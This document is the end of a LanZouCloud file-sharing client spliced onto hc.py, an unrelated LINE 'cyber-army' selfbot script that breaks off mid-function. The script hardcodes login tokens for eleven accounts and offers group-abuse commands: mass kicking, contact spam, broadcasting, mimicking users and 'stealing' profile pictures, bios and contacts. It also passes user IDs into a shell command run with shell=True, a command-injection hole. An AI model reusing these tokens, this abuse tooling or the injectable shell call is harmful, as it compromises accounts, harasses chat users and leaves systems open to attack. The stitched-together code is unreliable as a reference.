link_info = link_info.json()
if link_info["zt"] == 1:
f_name = link_info['inf'].replace("*", "_")
if not f_size:
f_size = re.search(r'大小:(.+?)</div>', second_page)
f_size = f_size.group(1) if f_size else ""
if not f_time:
f_time = re.search(r'class="n_file_infos">(.+?)</span>', second_page)
f_time = f_time.group(1) if f_time else ""
return ShareInfo(LanZouCloud.SUCCESS, name=f_name, url=f_url, pwd=pwd, desc=f_desc, time=f_time, size=f_size)
else:
return ShareInfo(LanZouCloud.PASSWORD_ERROR)
else:
f_name = re.search(r"<title>(.+?) - 蓝奏云</title>", first_page) or \
re.search(r'<div class="filethetext".+?>([^<>]+?)</div>', first_page) or \
re.search(r'<div style="font-size.+?>([^<>].+?)</div>', first_page) or \
re.search(r"var filename = '(.+?)';", first_page) or \
re.search(r'id="filenajax">(.+?)</div>', first_page) or \
re.search(r'<div class="b"><span>([^<>]+?)</span></div>', first_page)
f_name = f_name.group(1) if f_name else "未匹配到文件名"
f_size = re.search(r'文件大小:</span>([\.0-9 MKBmkbGg]+)<br', first_page)
f_size = f_size.group(1) if f_size else ""
f_time = re.search(r'上传时间:</span>([-0-9 :月天小时分钟秒前]+)<br', first_page)
f_time = f_time.group(1) if f_time else ""
f_desc = re.search(r'文件描述:</span><br>([^<]+)</td>', first_page)
f_desc = f_desc.group(1).strip() if f_desc else ""
return ShareInfo(LanZouCloud.SUCCESS, name=f_name, url=f_url, pwd=pwd, desc=f_desc, time=f_time, size=f_size)
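# Usage sketch for get_share_info_by_url (the share URL, password and `lzy` instance are
# placeholders/assumptions):
#
#     info = lzy.get_share_info_by_url('https://example.lanzoub.com/iAbCd123', pwd='6666')
#     if info.code == LanZouCloud.SUCCESS:
#         print(info.name, info.size, info.time, info.desc)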
def get_user_name(self):
"""获取用户名"""
params = {'item': 'profile', 'action': 'mypower'}
resp = self._get(self._mydisk_url, params=params)
if not resp:
return LanZouCloud.NETWORK_ERROR
username = re.search(r"com/u/(\w+?)\?t2", remove_notes(resp.text))
return username.group(1) if username else None
|
hc.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,ast,os,subprocess,requests,tempfile,shutil
from random import randint
from bs4 import BeautifulSoup
cl = LINETCR.LINE() #
#cl.login(qr=True)
cl.login(token="EnC4WWaxlvwEmc7dcSP0.4CtAvksI2snhv2NVBSkYCa.K9u0pjo345g+5fss46dtUTn+LjHxqViO//X6+CKT0Ro=")#1
cl.loginResult()
ki = LINETCR.LINE() #
#ki.login(qr=True)
ki.login(token="EnvemTPs8Qa2YKbBuVA0.B7g9A1RW8NU9Ui7lAHrOWa.P9dilyizvd39lOy91f1hSk22KHV+2vPWgWHEa2g3Spc=")#2
ki.loginResult()
kk = LINETCR.LINE() #
#kk.login(qr=True)
kk.login(token="EnZOZZ9kZ4WODDsqxs31.RF06i2MlCDf8zeGTj9WU0q.S+5zMf1Ulpeky0KBbMpiOog1bTqCXwxmYweJe8cMi90=")#3
kk.loginResult()
kc = LINETCR.LINE() #
#kc.login(qr=True)
kc.login(token="EnXmBtomSJHCsdaFbZdf.W88yhLv5KB7iGCAeG9HatW.JpNZkvpWh/ILie0XwNxU1f6eZInAITSBteN8kOQQH3Q=")#4
kc.loginResult()
ks = LINETCR.LINE() #
#ks.login(qr=True)
ks.login(token="Ene9Ti1iIrkwXqp9vard.RwYWimxkEVVSTgGwDES4Zq.XEmoYOqPwOjAv1q1DeUC+fPgTKlZrQM71+GmDW1yXXg=")#5
ks.loginResult()
k1 = LINETCR.LINE() #
#k1.login(qr=True)
k1.login(token="En8IS0miLXUQRK9D50b7.u8nse0mL8msEHLnmv4aB1W.Y9mRU7kZaH8hsUBV4KTpztvVF6YemjGZC9CtTLdZaFw=")#6
k1.loginResult()
k2 = LINETCR.LINE() #
#k2.login(qr=True)
k2.login(token="En3DJV84kyxlnDxEUgu1.1syMstDSV3v24TYSaZhuGq.wnmv5YqJ2AD6eP9VlObpjho7+NgW1F/omh0DSd0jdfE=")#7
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="EnhD1jtFz3ZqmYc1Mwef.3prmqNlyijQkxY3rR/6PpW.NSIwoj99XE0PwmdZt/vC8LYvZSJad5x8sufNhgUMCe8=")#8
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="En4xeP1I33q9RyICo3N4.rCBoqd8kZcG5lfgqkkRHva.DIAy/ldfCcUHUiBdzuVN4O5ec02tA9f3X9EKEGW2gng=")#9
k4.loginResult()
k5 = LINETCR.LINE() #
#k5.login(qr=True)
k5.login(token="En4owc91dhuHipQNGKu1.2WTRlb8YIh0JVt5n/ZaU0q.9Y50ddvpinMlhC573QGWqGgPxnw6/7frBDn+55YOWTc=")#10
k5.loginResult()
satpam1 = LINETCR.LINE() #
satpam1.login(token="EnOSrXRDTndViSyfOlK8.sGVPEFXZ6i6+6rw8Kxi3Ua.puKa4M8/10ixNMfPO0r1K+X3VC7YM+XJigTgyBDZELc=")#satpam opo
#satpam1.login(qr=True)
satpam1.loginResult()
print 'login success bos'
reload(sys)
sys.setdefaultencoding('utf-8')
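# NOTE: this script is written for Python 2 (print statements, reload(sys),
# sys.setdefaultencoding); it will not run unmodified on Python 3.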
helpMessage ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
╠═════════════
║ ◄]·♦·Menu For Public·♦·[►
║╔════════════
║╠[•]Help
║╠[•]Key
║╠[•]Mimin
║╠[•]Creator
║╠[•]Time
║╠════════════
║╠[•]Say....
║╠[•]Wkwkwk/Wkwk/Wk
║╠[•]Hehehe/Hehe/He
║╠[•]Galau
║╠[•]You
║╠[•]Hadeuh
║╠[•]Please
║╠[•]Haaa
║╠[•]Lol
║╠[•]Hmmm/Hmm/Hm
║╠[•]Welcome
║╠[•]Woy
║╠════════════
║╠[•]Wiki
║╠[•]Lyric
║╠[•]Instagram
║╠[•]Music
║╠[•]Youtube
║╠[•]Vidio
║╠════════════
║╠[•]Bc
║╠[•]Up
║╠[•]Berapa besar cinta
║╠[•]Apakah
║╠[•]Siapakah cewek
║╠[•]Siapakah cowok
║╠[•]Adakah
║╠[•]Cakepkah
║╠════════════
║╠[•]T-eng
║╠[•]T-japan
║╠[•]T-thai
║╠[•]T-id
║╚════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╚═════════════
"""
Keyowner ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
╠═════════════
║ ◄]·♦·Menu For Admin·♦·[►
║╔════════════
║╠[•]Kick ...
║╠[•]Invite (by mid)
║╠[•]Undang (Invite by kontak)
║╠[•]Tarik/Jepit (Invite by kontak)
║╠[•]Adminlist
║╠[•]Bot Add @
║╠[•]Spam... (spam on 10 tes)
║╠[•]Bot? (cek kontak bot)
║╠[•]Cancel (cncl undngn trtunda)
║╠[•]clean invites
║╠[•]clear invites
║╠════════════
║╠[•]Message change:...
║╠[•]Message add:...
║╠[•]Message
║╠[•]Comment:...
║╠[•]Add comment:...
║╠════════════
║╠[•]Jam on/off
║╠[•]Change clock
║╠[•]Jam Update
║╠════════════
║╠[•]Status (cek status room)
║╠[•]Cctv
║╠[•]Intip
║╠[•]Toong
║╠[•]Nk
║╠[•]Tajong
║╠[•]Vkick
║╠[•]Emak/Abah
║╠[•]Kill
║╠[•]Absen/Respon
║╠════════════
║╠[•]Ifconfig
║╠[•]System
║╠[•]Cpu
║╠[•]Kernel
║╠[•]Debug speed
║╠[•]Bot speed
║╠[•]Speed respon
║╠[•]Sp turunin
║╠[•]Sp naikin
║╠[•]Turun lagi
║╠[•]Spbot
║╠[•]Sp asli
║╠[•]Speedbot
║╠[•]Speed
║╚════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╚═════════════
"""
Setgroup ="""
╔═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╠═════════════
║ Owner : Kris
╠═════════════
║ ◄]·♦·Menu For Admin·♦·[►
║╔════════════
║╠[•]Cancel
║╠[•]Buka qr/Open qr
║╠[•]link open
║╠[•]Tutup qr/Close qr
║╠[•]link close
║╠[•]Rejectall (reject semua invite)
║╠[•]Protect:hight/low
║╠[•]Auto blockqr:off/on
║╠[•]Namelock:on/off
║╠[•]Blockinvite:on/off
║╠[•]Joinn on/off (kick protect join)
║╠[•]Cancel on/off(cncl all undngan)
║╠[•]Qr on/off (protect qr)
║╠[•]Contact On/off
║╠[•]Join on/off (auto join bot)
║╠[•]Gcancel:on/off (invite grup)
║╠[•]Leave on/off
║╠[•]Share on/off
║╠[•]Add on/off
║╠[•]Cancelall (canccel all invite)
║╠[•]Comment off/on
║╠[•]Backup:on/off
║╠[•]Mode on
║╠════════════
║╠[•]Info Group
║╠[•]ginfo
║╠[•]Group id
║╠[•]TL:....
║╠[•]Gn
║╠[•]LG
║╠[•]LG2
║╠[•]group list
║╠════════════
║╠[•]My mid
║╠[•]Mid Bot
║╠[•]Bot restart
║╠[•]Turn off bots
║╠[•]Allbio: (ganti bio stat bot)
║╠[•]Myname: (ganti nama bot)
║╠════════════
║╠[•]Banlist
║╠[•]Cek ban
║╠[•]Kill ban
║╠[•]Blacklist @
║╠[•]Banned @
║╠[•]Mid @"
║╠[•]Unban @
║╠[•]Ban
║╠[•]Unban
║╠════════════
║╠[•]Steal group pict
║╠[•]Steal cover @
║╠[•]Midpict:..
║╠[•]Steal pict
║╠[•]Steal bio
║╠[•]Steal mid
║╠[•]Steal contact
║╠[•]Mimic on/off
║╠[•]Targetlist
║╠[•]Mimic target
║╠[•]Target @
║╠[•]Del target @
║╠[•]copy @
║╠[•]Backup
║╠════════════
║╠[•]Spamcontact @
║╠[•]GBc
║╠[•]Pm cast
║╠[•]Bot like
║╠════════════
║╠[•]One piece
║╠[•]Kabur all
║╠[•]Kabur
║╠[•]Bot kadieu
║╠[•]Asupka:
║╠[•]Invite me
║╠════════════
║╠[•]Remove all chat
║╠[•]Admin add @ (by tag)
║╠[•]Admin remove @
║╠[•]Cleanse
║╠[•]Ready op
║╠[•]Greet
║╚════════════
║👑Hanya Utk Owner/Admin👑
╠═════════════
║ ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
╚═════════════
"""
KAC=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5]
DEF=[ki,kk,kc,ks,k1,k2,k3,k4,k5]
kicker=[satpam1]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Emid = k1.getProfile().mid
Fmid = k2.getProfile().mid
Gmid = k3.getProfile().mid
Hmid = k4.getProfile().mid
Imid = k5.getProfile().mid
Smid1 = satpam1.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
parameterMap={}
contactIds=[]
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Smid1]
induk=[mid]
Creator=["ufdf94db84c8d1fa665976c9eed50c8dd"]
admin=["ufdf94db84c8d1fa665976c9eed50c8dd",mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Smid1] #Krisna,kris,
owner=["ufdf94db84c8d1fa665976c9eed50c8dd"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"""тerima Kasih Sudah Menambahkan Aku Jadi Teman
≫ Aku Ga Jawab PM Karna aq Cuma Bot Protect ≪
>>✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰<<
≫ bot protect ≪
≫ SelfBot ≪
ṡȗƿƿȏяṭєԀ ɞʏ:
☆ FS3I FAMILY ☆
✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰
☆ ONE PIECE BOT PROTECT ☆
Idline: http://line.me/ti/p/GkwfNjoPDH""",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\n☆º°˚˚☆✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰☆º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"namelock":True,
"Backup":False,
"AutoKick":True,
"Mimic":False,
"pname":True,
"qr":True,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":True,
"protectionOn":True,
"Protectcancel":True,
"winvite":False,
"winvite2":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"atjointicket":True
}
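# Rough meaning of the main flags above, inferred from the operation handlers further down:
#   autoJoin      - bots auto-accept group invitations when invited by another bot or the owner
#   autoAdd       - auto-add anyone who adds the bot and reply with wait["message"]
#   Protectgr     - kick non-admins who open the group QR/ticket and close it again
#   Protectcancl  - cancel pending invitations made by non-admins and kick the inviter
#   Protectjoin   - kick anyone who joins while join protection is on
#   Protectcancel - kick whoever cancels a pending invitation
#   AutoKick      - re-kick whoever kicked a member and re-invite the victim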
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
backup = cl.getProfile()
profile = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
profile = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
profile = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
profile = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
profile = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k1.getProfile()
backup = k1.getProfile()
profile = k1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k2.getProfile()
backup = k2.getProfile()
profile = k2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k3.getProfile()
backup = k3.getProfile()
profile = k3.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k4.getProfile()
backup = k4.getProfile()
profile = k4.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
contact = k5.getProfile()
backup = k5.getProfile()
profile = k5.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
profile.displayName = contact.displayName
profile.statusMessage = contact.statusMessage
profile.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload the image at image_path to the configured Imgur album using the given client
(album and image_path are expected to be defined elsewhere).
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
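# Usage sketch: yt() scrapes the YouTube search results page and returns shortened links, e.g.
#
#     # hits = yt("lo-fi beats")
#     # -> ['youtu.be/abc123XYZ', 'youtu.be/def456UVW', ...]
#
# (Requires BeautifulSoup/html5lib and depends on YouTube's old HTML layout, so the selector
# '.yt-lockup-title > a[title]' may return nothing on current result pages.)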
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
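# The mention helpers build LINE "MENTION" metadata by hand. A sketch of the JSON that ends up in
# msg.contentMetadata (the mids are placeholders; the offsets match the strt/akh arithmetic above):
#
#     # {"MENTIONEES": [{"S": "14", "E": "16", "M": "u1234..."},
#     #                 {"S": "20", "E": "22", "M": "u5678..."}]}
#
# S/E are character offsets of each "@x" placeholder inside msg.text and M is the member's mid.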
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def MENTION(to,nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nama:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[COMMAND] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendAudioWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download Audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
print e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
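# Example: waktu(3725) -> '01 Jam 02 Menit 05 Detik' (1 hour, 2 minutes, 5 seconds).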
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for tex in tex:
for command in commands:
if string ==command:
return True
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel😛")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel😛")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Creator:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Creator:
